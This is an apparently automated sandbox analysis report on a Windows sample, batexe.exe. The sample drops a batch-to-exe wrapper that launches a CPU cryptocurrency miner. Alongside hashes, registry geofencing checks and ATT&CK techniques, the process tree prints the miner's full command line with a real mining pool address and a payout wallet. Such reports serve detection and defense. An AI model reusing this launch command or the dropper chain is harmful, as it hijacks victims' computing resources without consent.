73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
289s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18-02-2024 12:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1780	b2e.exe
5176	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5176	cpuminer-sse2.exe
5176	cpuminer-sse2.exe
5176	cpuminer-sse2.exe
5176	cpuminer-sse2.exe
5176	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5264-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5264 wrote to memory of 1780	5264	batexe.exe	84
PID 5264 wrote to memory of 1780	5264	batexe.exe	84
PID 5264 wrote to memory of 1780	5264	batexe.exe	84
PID 1780 wrote to memory of 2908	1780	b2e.exe	85
PID 1780 wrote to memory of 2908	1780	b2e.exe	85
PID 1780 wrote to memory of 2908	1780	b2e.exe	85
PID 2908 wrote to memory of 5176	2908	cmd.exe	88
PID 2908 wrote to memory of 5176	2908	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5264
- C:\Users\Admin\AppData\Local\Temp\9E92.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9E92.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9E92.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A151.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9E92.tmp\b2e.exe

Filesize
4.4MB

MD5
04e3c0444cdc0b228af49093bcda2672

SHA1
d2cb751c7420fdc1a578b57b113778c2c8bc5665

SHA256
78b3ca53c872212b635dfa2a0af3150f3a9fbd0090ae817790d3fc757be403ea

SHA512
fa7ff6357ecd2c8da7ecabcc49db2bcd2d53560b5deb74141cbbfd9715c1ecfacc4aaa9d68accc5d1b0552a2674dcb6d48e457754971a4d87b2e87118959a2cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\9E92.tmp\b2e.exe

Filesize
1.9MB

MD5
c4e95ad640b0f67b06af3f7b77d635b1

SHA1
d11c016e0ec19f3b4016b7c8f63043ba08d0baaa

SHA256
8e47d4d015e8f3722a592332114682731435a52788c64f60d41ba4ea3685d208

SHA512
68174959dce788bd08677fd4a19b39268c29231c8f31be5f5e4ce2b2ce1da69e5e3ce1ce495658b5735d7a023e3f57493b308d4c99aa7f7fb05af42ff7927314

Download Submit
C:\Users\Admin\AppData\Local\Temp\9E92.tmp\b2e.exe

Filesize
1.4MB

MD5
6af88028ec84dea04e8b51365ae9b399

SHA1
dd590a835c5b2c024044d88e790ce43a58316826

SHA256
76fae1dfc975429a424d2fdaf2b2c7d0439a194de0aeebcb942506aa1864f679

SHA512
0bec462889e330eb406a9cb756e0fa3afa7959dadad9e61ef0b0476ab2098bdca47c468bc358ee5a4b4ed3b3efc2efa774f7666f743af716a1cb1599d17cb848

Download Submit
C:\Users\Admin\AppData\Local\Temp\A151.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
344KB

MD5
a3dcd319e3803ec6d0feb9229ea4721e

SHA1
5661d3ef7be4d4714870741b71be3ad86151ba35

SHA256
e2ae021a42eda6ef8d13495b7d1c8821da2f7ad48141503fc4b99e0124692dbf

SHA512
e2aa34a950ccccc0409c2138261498d9809949b43f0b222c06026ab2d2327c9a7ad2f6ccc1f7b4179c50b83b9ff2e1522a11880a4124f09a4fe14e27461a1551

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
249KB

MD5
b2813ae7e680172f6db01ded19f5d903

SHA1
e64ee600d1fd9150c29f27e1c28c899f51faa3d4

SHA256
ed4a59bf46ffc8680b22684f0202f51670d8c4b6863210fcae5c1255475b5967

SHA512
029221d2858176e9edf50f51c2ac290c3e8417573590ff2c4dde7fcf049781d72782f7c49e484d8a951878eab99783f31d96fd3b96e7e81d83e63379b8aa7bce

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
405KB

MD5
9d5f87dc93403cacc2974853e5734a21

SHA1
01cea67e7d08ba186f4597f0a4489c0213d0d89b

SHA256
0b25e06525b8e8c429620c3651df84a8b97d6e57aff89d5a8cbdbb387220fec1

SHA512
33f61d3303263217f8c85d014f2cc121617c8f47163a63fb9294f09d10efba194f77c4b053ba9eabc6f87d1e6201db2662c4173c7741a2af24d62ffcf6bfdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
351KB

MD5
30d907fa27f42ed3bfe88c3f340a937b

SHA1
b90a1298f1109ac552dd007eda90f4cef1b2c848

SHA256
5a13b7927a2f03bf1f5b8453bb9979f0923da1dbb6052b92d2f57a22bd75de84

SHA512
d48d8b2e48b779772c4a2cf7a94b1555643cc2e2bfbae8ca973a92877bdc5a97c8e127e0ab47b0764104d48a69ba0b706ac519c90666c56d22c693570a7f1afb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
331KB

MD5
86e67be03c3ce82da15533dd4f453d22

SHA1
58b5253ece21621349f61babd119ccb814d36e85

SHA256
2570b1f52e3260e37fe4fd6be43917d5a9846d3c7a71c4699fe8ff5c0c84c850

SHA512
8e9c0523eb407f676609cb8debc8319573425ed008ae1001fc6f602dbf53df0ad9056ea82ce1bd23c79e374550f4023a0537fefc59203374a405c389b6d0f515

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
213KB

MD5
2aaae8b1a7d1ce35875b0a41bd82c88d

SHA1
f7fad7a13d2910efefacf8c7313c475ae1e61f2a

SHA256
8679b2ae8ce45f874a5846db4d61e9b4b7fda86bb9e9b00f5a56e04af42a1659

SHA512
de0cac8626453b52fb9352caf5dc1417d775dfde1bc5ce2f5a91e0f395feae039584e86a5e6d531fbe42993578975b7fe7f0b6fdda076b82f2636f9821736199

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
319KB

MD5
02743b3d29a4e95476f3d7c72776984b

SHA1
2460ac0c4b6c3c44b09e7aa86b4f7809dfce1bd3

SHA256
c72bfeaccba7f6801b44e657620f10fd210170422163a571e9f6019f6e873b6a

SHA512
99e825754b521ca997dd96bf3fb1fd943ecc439e5b751006f5bb86b1281dc47a8d8f6eae9156bce734a225546eda5ca25dfe95ff913bca1daec6fe0aebb112c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
167KB

MD5
f9e102f5dbec791b1ba0ad07fd987a9d

SHA1
ef3790b3be37958d9ffc2e23875507ead2adfef0

SHA256
de07b944ba9553369b8e331304a54575d9581064f7caa18eb178358a72f9a63d

SHA512
9f2a5555e4a06c08467fcdc360df5831a326341754984ad57417ebceef3577da34b2661fbe0e98195deee7221b2cefb6739b8f3c3dc2c4d8895d814226f1604d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
220KB

MD5
c05bbc490c1d8acb6a3ec3680401ebec

SHA1
bff6a080c6887ade880cd9d362b437cba544da54

SHA256
abcae96a54ed9c8ed3614c369ba4c9d41afd4d6231b9466394b4de62de796bc7

SHA512
995e0c37007ea817013cdfc274701cf4665fa75f8ba1182331631109c1551ce74462e322d38e932600c189dc49ef3db279e45f1839d8d085dd9f5891041c2bef

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
222KB

MD5
833bcc9cf453a5f7fbfb3788d1503b7c

SHA1
fcb642ad6d87d612e2af58d51160cbd795f9c534

SHA256
fb3b68dcb60c3a69a936e1d09307c1c4fe0e5aa808cc78e2f604daf1104fb0fc

SHA512
022198b89def24057e49ed2ae677e02231c327704aa7bcff7347d482048058fa9d0af97122465cccc563353b6e412e448e08c3881447c8674b96c9cb1db6f996

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
197KB

MD5
3c3ae1ad5596b65a4bbb68e7ce201dc9

SHA1
c3ac47ca8321b7262552562044612cd5de6ad7fd

SHA256
42554b5ae4abc27d77efe872dd20e5db315c6a2e5a40b1f626eb035ee5240821

SHA512
bd51950fe25970e023006812eecafdd1aeacf62b621ff84215cac0a1311ddfea0bd39a19ffe3bd3718d8e0addc97187e3f347f7538f7c91fd390879287597afa

Download Submit
memory/1780-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1780-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5176-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5176-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5176-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5176-45-0x000000005FC20000-0x000000005FCB8000-memory.dmp

Filesize
608KB

Download
memory/5176-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5176-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5176-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5176-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5176-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5176-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5176-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5176-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5176-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5264-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download